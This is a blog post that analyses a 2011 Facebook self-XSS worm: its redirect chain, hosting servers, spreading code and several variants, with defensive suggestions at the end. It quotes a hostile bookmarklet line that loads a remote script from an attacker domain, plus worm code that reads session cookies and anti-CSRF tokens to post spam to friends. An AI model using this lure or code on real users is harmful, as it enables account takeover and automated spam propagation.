Taking down Facebook worms
The other day i was browsing Facebook and a friend of mine posted this on my wall:
This is realy insane.. you have to see this
OMG.. Look What THIS Kid Did to His School After Being Expelled!
j.mp
WARNING: Graphic Content!
Not only for the reason that he is dutch this would be fishy, he posted this message on all his friends walls at the same moment.
I was interested in the reasons why somebody would create such worm so I started to poke around and see what I could find.
The application behind j.mp is pretty good, it's a url shortener web application in which you can track the clicks made to the url, localize your visitors, lookup the referrers and just has anything a url shortener program should have.
Let's see where we are going:
http://j.mp/ilMSsO ===(301 Moved)===> http://zamalo.nl.ai/
I looked up this domain, got whois information and was able to find the phone number of the owner from a different place.
I did had contact with the owner of this domain and the person was knowledged in computer security, I was able to verify the details - also there was more proof that this person has knowledge in computer security.
I am not going to publish personal details about the person for my and the persons protection - it might not even be the right person.
owner@box2:~$ nc zamalo.nl.ai 80 GET / HTTP/1.1 Host: zamalo.nl.ai HTTP/1.1 301 Moved Permanently Date: Sun, 15 May 2011 12:08:05 GMT Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Location: http://j.mp/itYim7 Content-Length: 368 Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://j.mp/itYim7">here</a>.</p> <hr> <address>Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at zamalo.nl.ai Port 80</address> </body></html>
The only thing we get is a 301 Moved Permanently back to a j.mp link.
This server looks a lot like a trick to make it hard for facebook to ban the links.
If j.mp or Facebook would ban a link, the creators of the worm can just change the link being spread in the source code, if the creators would use a static link it would be possible to ban it and they would lose the game but this way they can keep track of who, what and where people are clicking on links and monitor if the links are being banned and possibly change the link if necessary.
http://j.mp/itYim7 ===(301 Moved)===> http://www.facebook.com/pages/Crazy-kid-vide0/186441208070914?sk=app_190322544333196
Now we are back at facebook.com on some page called "Crazy kid vide0".
http://s3.amazonaws.com/statichtmlplus/page/200936989948618.html is the page which you are looking at right now.
The page is asking us to do their 5 second security check and a big box called "Watch the Video", it looks like a normal Facebook page so let's click the blue button.
The page contains 1 image - http://1.bp.blogspot.com/-mPStXUBwF8Y/TcDklWEtieI/AAAAAAAAAAs/_EdzOJvct6E/s1600/bg1.png
The page first wants us to click a button and then do the following set of instructions:
1 - Press CTRL + C
2 - Press ALT + D
3 - Press CTRL + V
4 - Press Enter
5 - Watch video!
This is what happens when you clicked the button is is that it executes this Javascript:
<script type="text/javascript">// <![CDATA[
$(document).ready(function() {
$("#button").click(function(){
$("#button").css("display","none");
$("#key").css("display","block");
$("#c").focus();
$("#c").select();
});
});
// ]]></script>
#c is a text area containing:
<textarea id="c">
javascript:(a=(b=document).createElement('script')).src='//zaman.c0m.li/k.js',
b.body.appendChild(a);void(0)
</textarea>
CTRL-C = copy
ALT-D = select the address bar and selects all characters in it
CTRL-V = paste
ENTER = execute whatever is inside the address bar
So when we click the button it pushes #c to our clipboard, when we follow the instructions we will load some script.
The Javascript manually loaded will create a new HTML script element to your document located at http://zaman.c0m.li/k.js
c0m.li is a service a lot like nl.li; the only difference is that it seems c0m.li is getting DDoSed at this moment or something.
It has a whois lookup system but by the time it was back up the domain got deleted again along with the whois records.
http://s3.amazonaws.com/statichtmlplus/page/200936989948618.html is also loading a public tracking application (whos.amung.us).
http://whos.amung.us/stats/kn9gjo9y9tms/
Here we can see that the tracking system is active since April.
There is also a live stream of what is being copied to the clipboards real time - quite funny because there we can see the malicious script being copied to loads of clipboards.
It is a way of social engineering your victim to execute Javascript in it's browser on a specific domain - this is a thing Facebook can't do a lot about because the attacker is abusing the stupidity of the human being and not an actual server vulnerability Facebook can do anything about.
You can find a full backup of the malicious javascript here.
Let us go through the code:
function readCookie(name) {
var nameEQ = name + "=";
var ca = document.cookie.split(';');
for (var i = 0; i < ca.length; i++) {
var c = ca[i];
while (c.charAt(0) == ' ') c = c.substring(1, c.length);
if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length);
}
return null;
}
readCookie() has nothing malicious - it's a function made by Scott Andrew and is legally being shared over the web; it takes 1 argument which is the name of the cookie you want the value from returned.
var user_id = readCookie("c_user");
var user_name = document.getElementById('navAccountName').innerHTML;
This takes the cookie "c_user" from the cookies with the function readCookie() and it grabs the full name of the facebook account with a DOM request to the contents of the div "navAccountName".
var coverpage = function() {
var boxdiv = document.createElement('div');
boxdiv.id = 'coverpage1';
boxdiv.style.display = 'block';
boxdiv.style.position = 'absolute';
boxdiv.style.width = 100 + '%';
boxdiv.style.height = 100 + '%';
boxdiv.style.top = 100 + 'px';
boxdiv.style.margin.top = 100 + 'auto';
boxdiv.style.margin = 0 + 'auto';
boxdiv.style.textAlign = 'center';
boxdiv.style.padding = '4px';
boxdiv.style.background =
'url(http://1.bp.blogspot.com/-A0gpB7_AX3o/Tc71HASoEXI/AAAAAAAABKs/EjquUCzFw20/s1600/pgvws.png)
no-repeat scroll center top';
boxdiv.style.fontSize = '15px';
boxdiv.style.zIndex = 9999999;
boxdiv.innerHTML=' <table align="center" cellpadding="5" cellspacing="5" width="400px"><tr align="left">
<td valign="middle"><br /><br /><br /><br /><img style="border: 1px solid black;padding:5px;
margin:10px;width:140px;height:140px;" src="http://graph.facebook.com/'+user_id+'/picture?type=large" />
</td><td align="left" valign="middle"><font style="font-weight: bold;font-size:16px;">'+user_name+'</font>
<br /><img src="http://i.imgur.com/hRjNi.gif" style="margin-left:20px;padding-left: 5px;"/></td></tr>
</table>';
document.body.appendChild(boxdiv);
}
coverpage();
Here the script creates a div with the id "coverpage1"; it has a background image to "http://1.bp.blogspot.com/-A0gpB7_AX3o/Tc71HASoEXI/AAAAAAAABKs/EjquUCzFw20/s1600/pgvws.png" which looks a lot like the image seen earlier "http://1.bp.blogspot.com/-mPStXUBwF8Y/TcDklWEtieI/AAAAAAAAAAs/_EdzOJvct6E/s1600/bg1.png".
This div being created looks identical to the one created earlier but with a different message.
This image says "Please wait while we verify your profile.." and looks like a legit Facebook message.
There will also be an animated gif from here:
http://i.imgur.com/hRjNi.gif
An animated gif of 10 frames saying "Scanning...." this image did not had any good exif tags.
On imgur.com you can see that this picture has been seen over 900.000 times and that it was uploaded 2 weeks ago.
source: http://imgur.com/hRjNi
// Setup some variables
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
// Chat message variables
var this_chat = "The kid in This video is realy insane..
he went beserk when he was being expelled frm sch0ol.. see what he did j.mp/ilMSsO";
var prepared_chat = encodeURIComponent(this_chat);
This can make us believe that there are more versions of this piece of malware.
The creator used the variable prepared_chat only once after declaring it here, this may be because the virus writer wants to make it easy and fast to set this up.
On the other hand - other things in this code are hard-coded.
The next part of the code will cause that it will post something on all friends wall's.
var paramswp = "post_form_id=" + post_form_id + "&fb_dtsg=" + fb_dtsg + "&xhpc_composerid=u574553_1&xhpc_targetid=" + response1.payload.entries[count].uid + "&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0& attachment[params][metaTagMap][0][http-equiv]=content-type& attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8& attachment[params][metaTagMap][1][property]=og%3Atitle& attachment[params][metaTagMap][1][content]=Check Out your PROFILE Stalkers& attachment[params][metaTagMap][2][property]=og%3Aurl& attachment[params][metaTagMap][2][content]=http://www.facebook.com& attachment[params][metaTagMap][3][property]=og%3Asite_name& attachment[params][metaTagMap][3][content]=OMG.. Look What THIS Kid Did to His School After Being Expelled!& attachment[params][metaTagMap][4][property]=og%3Aimage& attachment[params][metaTagMap][4][content]= http://4.bp.blogspot.com/-lmHwQBX07Kw/Tc-3MRTZ2NI/AAAAAAAAABI/3XTJXVFF8YY/s320/little-boy-arrested22.jpg& attachment[params][metaTagMap][5][property]=og%3Adescription& attachment[params][metaTagMap][5][content]=WARNING: Graphic Content!& attachment[params][metaTagMap][6][name]=description& attachment[params][metaTagMap][6][content]=BBC News& attachment[params][metaTagMap][7][http-equiv]=Content-Type& attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8& attachment[params][medium]=106& attachment[params][urlInfo][user]=http://j.mp/keyNwY& attachment[params][favicon]=http://lol.info/os/favicon.ico& attachment[params][title]=OMG.. Look What THIS Kid Did to His School After Being Expelled!& attachment[params][fragment_title]=& attachment[params][external_author]=& attachment[params][summary]=WARNING: Graphic Content!& attachment[params][url]=http://www.facebook.com& attachment[params][ttl]=0& attachment[params][error]=1& attachment[params][responseCode]=206& attachment[params][metaTags][description]=WARNING: Graphic Content!& attachment[params][images][0]= http://4.bp.blogspot.com/-lmHwQBX07Kw/Tc-3MRTZ2NI/AAAAAAAAABI/3XTJXVFF8YY/s320/little-boy-arrested22.jpg& attachment[params][scrape_time]=1302991496& attachment[params][cache_hit]=1& attachment[type]=100& xhpc_message_text=Get it now hurry while it lasts& xhpc_message=This is realy insane.. you have to see this& nctr[_mod]=pagelet_wall& lsd& post_form_id_source=AsyncRequest";
The wall post being created is the one which originally started my investigation.
As you can see the described message "OMG.. Look What THIS Kid Did to His School After Being Expelled!" is hard coded in attachment[params][title].
What is pretty funny is that the author of the code must have changed the url in the time I have been investigating this code since it now points to "http://j.mp/keyNwY" - this means that his previous link got terminated probably or he automatically changes it.
Why http://lol.info/os/favicon.ico is there is not really obvious in my opinion.
The image of a boy being arrested can be found here: http://4.bp.blogspot.com/-lmHwQBX07Kw/Tc-3MRTZ2NI/AAAAAAAAABI/3XTJXVFF8YY/s320/little-boy-arrested22.jpg
The next part will send a message to all online users through chat.
When you try to say "zaman.c0m.li" through chat it will get filtered out by facebook with the following message:
This message contains blocked content that has previously been flagged as abusive or spammy. Let us know if you think this is an error.
The creator of this malware actually hacked around this by having the little server before it loads the javascript.
It looks like this:
j.mp link -> tamper -> j.mp link -> malicious javascript
This way facebook has a really hard time forbidding this page to be loaded.
The creator can at all times change the j.mp links which makes it impossible to filter it out for facebook.
Now this code will attempt to make you like I-Love-Pets, I-Love-My-Mom and I-Love-Money.
http://www.facebook.com/pages/I-Love-Pets/218575568172183?sk=wall&filter=12
http://www.facebook.com/pages/I-Love-My-Mom/209705679060357?sk=wall&filter=12
http://www.facebook.com/pages/I-Love-Money/208298029210038?sk=wall&filter=12
After 19 seconds the function landingpage() will be loaded which redirects you to http://kid-expelled-vide0.blogspot.com/.
That page contains google adds which will give the malware writers more money.
So let's summarize what this malware does
- Propagate
through Facebook wall posts
through Facebook chat
- Like the following groups
I-Love-Pets (218575568172183)
I-Love-My-Mom (209705679060357)
I-Love-Money (208298029210038)
- Redirect to a blogspot page with adds which give income to the malware writer
Special things:
- The virus writer can track it's infections with a free stat program.
- external data is being loaded from various sources
- Images are hosted on free web hosting places
External files:
http://s3.amazonaws.com/statichtmlplus/page/200936989948618.html
http://1.bp.blogspot.com/-mPStXUBwF8Y/TcDklWEtieI/AAAAAAAAAAs/_EdzOJvct6E/s1600/bg1.png
http://code.jquery.com/jquery-1.5.2.min.js
http://widgets.amung.us/tab.js
https://s3.amazonaws.com/statichtmlapp/scrollbar.js
http://zaman.c0m.li/k.js
http://1.bp.blogspot.com/-A0gpB7_AX3o/Tc71HASoEXI/AAAAAAAABKs/EjquUCzFw20/s1600/pgvws.png
->exif tags show us that the "Author" tag contains "Ulead Systems, Inc."
http://i.imgur.com/hRjNi.gif
http://imgur.com/hRjNi shows us that it was uploaded 2 weeks ago and has been viewed over 1 million times
http://4.bp.blogspot.com/-lmHwQBX07Kw/Tc-3MRTZ2NI/AAAAAAAAABI/3XTJXVFF8YY/s320/little-boy-arrested22.jpg
http://lol.info/os/favicon.ico
http://code.jquery.com/jquery-1.5.2.min.js
virustotal.com tells us that k.js only is being detected by Kaspersky as "HEUR:Worm.Script.Generic":
Antivirus Version Last Update Result
Kaspersky 9.0.0.837 2011.05.11 HEUR:Worm.Script.Generic
Geographic map to locate where infections take place
whos.amung.us
The statistics can be viewed here:
http://whos.amung.us/stats/kn9gjo9y9tms/
This displays us that the worm actually started getting a big impact from 10 this morning with 3.500 loads, then after that this worm grew exponentially and 9 hours later it managed to load over 50.000 times in 1 hour.
Yesterday at 19:00 there we're just 4 loads in the entire hour.
The stat program also shows that this tracking key was being used on the following pages:
http://s3.amazonaws.com/statichtmlplus/page/187101854670418.html
http://www.iframewrapper.com/ifwrapper/index000.php
http://s3.amazonaws.com/statichtmlplus/page/208841752468551.html
http://s3.amazonaws.com/statichtmlplus/page/129779460433030.html
http://s3.amazonaws.com/statichtmlplus/page/207774512590664.html
http://174.133.107.178/~nextdeal/hk/
These links all look cool and all but 1 really seems interesting - it's http://174.133.107.178/~nextdeal/hk/.
owner@box2:~$ nmap 174.133.107.178 Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-15 22:48 CEST Nmap scan report for b2.6b.85ae.static.theplanet.com (174.133.107.178) Host is up (0.16s latency). Not shown: 978 closed ports PORT STATE SERVICE 1/tcp filtered tcpmux 3/tcp filtered compressnet 4/tcp filtered unknown 6/tcp filtered unknown 7/tcp filtered echo 9/tcp filtered discard 13/tcp filtered daytime 17/tcp filtered qotd 19/tcp filtered chargen 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 26/tcp open rsftp 53/tcp open domain 80/tcp open http 110/tcp open pop3 135/tcp filtered msrpc 143/tcp open imap 443/tcp open https 465/tcp open smtps 993/tcp open imaps 995/tcp open pop3s
Let's get some more information about what's all there on port 80
ip:174.133.107.178
www.rapvet.com
www.moviehd.net
piclol.net
onlinemaking.com
likeportal.com
funnypicsnow.com
quoteslol.com
www.landjsolutions.com
tristateautomobile.com
www.funnypicsnow.com
likepages.us
www.piclol.net
l1ll.info
likeportal.com
www.rapvet.com
likequotes1.info
www.likemyfb.com
www.likepics.us
songsource.net
yupbro.com
songsource.net
yupbro.com
4635.profilestalk.com
profilestalk.com
songsource.net
likebelow.com
www.moviehd.net
quoteslol.com
For now, let's leave this host; the fingerprints show that this is not the same IP as where the active Javascript is running.
There are facebook related things on here which seem pretty evil - let's just leave it for now.
Let's go fingerprint the server where the evil Javascript is running.
owner@box2:~$ nslookup 174.122.44.67 Server: 192.168.2.1 Address: 192.168.2.1#53 Non-authoritative answer: 67.44.122.174.in-addr.arpa name = 43.2c.7aae.static.theplanet.com. Authoritative answers can be found from: owner@box2:~$ nslookup zaman.c0m.li Server: 192.168.2.1 Address: 192.168.2.1#53 Non-authoritative answer: Name: zaman.c0m.li Address: 174.122.44.67 220-gator1229.hostgator.com owner@box2:~$ nmap 174.122.44.67 Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-15 22:55 CEST Nmap scan report for 43.2c.7aae.static.theplanet.com (174.122.44.67) Host is up (0.18s latency). Not shown: 975 closed ports PORT STATE SERVICE 1/tcp filtered tcpmux 3/tcp filtered compressnet 4/tcp filtered unknown 6/tcp filtered unknown 7/tcp filtered echo 9/tcp filtered discard 13/tcp filtered daytime 17/tcp filtered qotd 19/tcp filtered chargen 21/tcp open ftp 22/tcp filtered ssh 25/tcp open smtp 26/tcp open rsftp 53/tcp open domain 80/tcp open http 110/tcp open pop3 135/tcp filtered msrpc 143/tcp open imap 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 2222/tcp open unknown 3306/tcp open mysql Nmap done: 1 IP address (1 host up) scanned in 6.02 seconds
Bing.com tells us the following:
ip:174.122.44.67
cosmeticindex.com
www.elcaminonationforum.com
hystericalminds.com
simplestorageshedplans.com
www.jetsetsam.com
northstarantiques.net
funboardgames.org
www.etech9.com
livingwordwaukesha.org
nostra-pizza.com
www.etech9.com
dorloo.com
www.animedio.com
www.tanadol.com
lastpoint.biz
profilewatcher.facebook.randomobia.com
girlkillsherself.facebook.randomobia.com
gunceldurum.com
310cashzyngapromo.randomobia.com
www.kamilce.com
kidexpelled.randomobia.com
www.onelasallevancouver.com
mac-downloads.info
attorneyrainmaker.com
11stepwebsite.com
www.turksikisizle.com
nearbylocksmith-silverspring.com
www.askerliksorgulama.com
www.zorunlutrafiksigortasi.net
girlkilledherself.randomobia.com
isms.co.com.au
tiresedmonton.ca
bragardcanada.com
thenockfamilycircus.com
->www.girlsuicide.co.com.au
keepingskinbeautiful.com
usguy.vv.cc
allvacancies.info
->expelledkid.randomobia.com
sevendollarheaven.com
www.icu3.net
www.kidgoescrazy.co.com.au
property-in-secunda.com
www.cosmeticindex.com
www.gazetaonline.net
azbusinesslistings.com
www.gunceldurum.com
scholarshipnow.us
azbusinesslistings.com
www.gunceldurum.com
scholarshipnow.us
expansiongift.ce.ms
covergirlstyle.com
www.storeimpresiones.cl
->girlkilledbaby.randomobia.com
www.indy4me.com
kidgoescrazy.co.com.au
www.oyunbuz.com
www.scarfknitting.com
www.farmbonus.co.com.au
www.celebvids.celebritythongs.net
www.srksurucukursu.com
ikballesifalibitkiler.com
www.canlitvizle1.com
www.vuelveajugar.cl
www.askerliksorgulama.com
www.etech9.com
farmbonus.co.com.au
www.akvaryumbalik.net
webhostingterbaik.com
gunceldurum.com
usguy.vv.cc
www.nurnet.org
www.canlitvizle1.com
www.hystericalminds.com
elcaminonationforum.com
propedall.com
toronto-realestate.mobi
traffictospare.com
get1video.com
whattogetagamer.com
seorank2.com
expelledkid.randomobia.com
sevendollarheaven.com
tomsolution.com
www.kidgoescrazy.co.com.au
www.whattogetagamer.com
giftideasforgamers.com
westriverfire.com
aquaemails.com
sevendollarheaven.com
giftideasforgamers.com
property-in-secunda.com
www.marketinginfo.info
iphone4error.com
videoclips.gazetaonline.net
tirecalgary.com
newscrunched.com
www.cosmeticindex.com
www.myviphealth.com
attorneyrainmaker.com
azbusinesslistings.com
->girlkilledbaby.randomobia.com
As seen here; this server hosts a lot of suspicious things.
Let's leave this server and do some checks on the fingerprint of this worm and see if the code is being reused a lot.
Source code fingerprint
By googling for "var coverpage = function() {" we get 119 results.
Let's go through the result:
http://pastebin.com/Lk7gSkJq
This is another version of the worm uploaded May 13th, 2011.
The content of the wall post would include things like:
Check Out your PROFILE Stalkers
Now you can see who stalk your profile daily
OMG! Its unbeliveable now you can get to know who views your facebook profile.. i can see my top profile visitors and i am so shocked that my EX is still creeping my profile every hour
It's using tinyurl as url shortener, the link which is http://tinyurl.com/3llg74u and is being banned by tinyurl.
The favicon is pointed to "http://lol.info/os/favicon.ico" which was the same for the other worm I would highly suggest Facebook to filter out this favicon location; this could be a generic way to bring down a lot of spam.
This worm will become fan of the following groups:
I Love Pets
I Love Sex
I Love Money
Then when all is finished it redirects you to http://smrtapplication.info/results.php where you still can't see your stalker.
Right, we can assume there are more versions of this
http://pastebin.com/8eE260Tk
Once again another version of the worm - uploaded on May 11th, 2011.
The wall post would include:
Stop creepin on me, I seen you looking at my profile.. I just scanned my profile.. you can scan yours too.
This one looks like an extended version of the worm, forbidding the favicon "http://lol.info/os/favicon.ico" would stop this version too.
It's using tiny.cc for url shortening and this version of the worm has more links at once.
var linkies = [
"http://tiny.cc/cepag",
"http://tiny.cc/b19nm",
"http://tiny.cc/e2q60",
"http://tiny.cc/o7op3",
"http://tiny.cc/m4xm3",
"http://tiny.cc/moohg"
]
Here is the way it selects a link:
var this_chat = "Will you stop looking at my wall? I know you are because I just scanned my profile and seen you on there.. See for yourself.. " + linkies[Math.floor(Math.random()*linkies.length)];
The links (which are not being banned at this moment) point to the following url:
http://www.facebook.com/pages/FindYourStalkers/214672328551612?sk=app_6165549526
This worm looks a lot like the previous version, even the image of the wall post would still be the same (http://imgur.com/Drajx.gif it's removed already).
This worm becomes fan of:
http://www.facebook.com/pages/You-always-remember-your-first-love/121864624558934
http://www.facebook.com/pages/I-Love-Sex/153193938081099
and some banned application id's.
The worm finally tries redirecting you to:
http://myfb-apps.info/stalkers.php
http://pastebin.com/7raazUFF
And another version of the worm from pastebin.com - May 13th, 2011.
This one is using tinyurl.com for url shortening.
The wall post will include:
OMG! Its unbeliveable now you can get to know who views your facebook profile.. i can see my top profile visitors and i am so shocked that my EX is still creeping my profile every hour
This version of the malware once again is using "http://lol.info/os/favicon.ico" as favicon.
Becomes fan of:
I love money
I love sex
I love animals
Final redirection is to http://smrtapplication.info/results.php
http://pastebin.com/RsdMiHUp
Uploaded on May 3rd, 2011
This version is focussed on people being interested in the murder of Osama, Osama got killed the 2nd May of 2011, this worm was uploaded on pastebin.com the 3rd which means it might have been developped even the same day!
The chat message which it spreads was:
Watch the Osama Shoot down video @ http://on.fb.me/iCNozz
The favicon being used here was located at "http://dottot.info/os/favicon.ico".
http://mydominio.info/how/boom.php
This domain actually is being actively used for worming more facebook users.
http://mydominio.info/how/ -> http://mydominio.info/how/boom.php
favicon.ico is still the same
This version is based on the osama version of the malware.
http://mydominio.info/fin.php - same as http://mydominio.info/how/
http://stalkersonfb.co.tv/jsp.php
This one is trying to make people believe that they can monitor their friends
It redirects to profile-checker.co.tv
wall post:
Whos watching your profile?
chat message:
yo ! check now who was watching You, go here http://goo.gl/dkJas
goo.gl=url shortener, link was not being banned.
favicon="http://dottot.info/os/favicon.ico"
http://bindetah.co.cc/d.php
Chat message:
Father walks in on his Daughter... EMBARRASIN! @ bit.ly/jEtvSm
Wall post:
Father walks in on his Daughter... EMBARRASIN!
favicon:
http://dottot.info/os/favicon.ico
http://r00tsecurity.org/forums/topic/13898-facebook-scam-source-code-virus/
Posted: 17 May 2011
Chat message:
omg!! i just got my $1,000 jetBlue giftcard in the mail today!! go get one 2 so we can go somewhere 
x.co/XFG8
Favicon:
http://lol.info/os/favicon.ico
http://sarahs-muse.livejournal.com/1188743.html
This version is entirely different from all we have seen before.
This one must have been the prototype of the worm I am investigating - it's developped begin April and has loads of debugging otions.
I went through some more versions but all show about the same fingerprints; just different messages.
Conclusion:
First of all I could warn you for not doing weird instructions from a website to XSS yourself when you get an interesting wall post but that should be obvious.
AV software can protect against these attacks by making a fingerprint of the malware like Kaspersky did already.
Facebook can clean up lot's of wall posts by removing all wall posts with the following favicon locations and forbidding new ones:
http://lol.info/os/favicon.ico
http://dottot.info/os/favicon.ico
Also they should take a look at these groups which are being boosted by the malware:
I love money (208298029210038) (>340.000 likes)
I love sex (153193938081099) (>45.000 likes)
I love pets (218575568172183) (>300.000 likes)
bookmarkt.
Hello, I am Jelmer born in 1991 and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email jelmerdehen [ at ] hotmail [d0t] com Or you can chat with me in the IRC.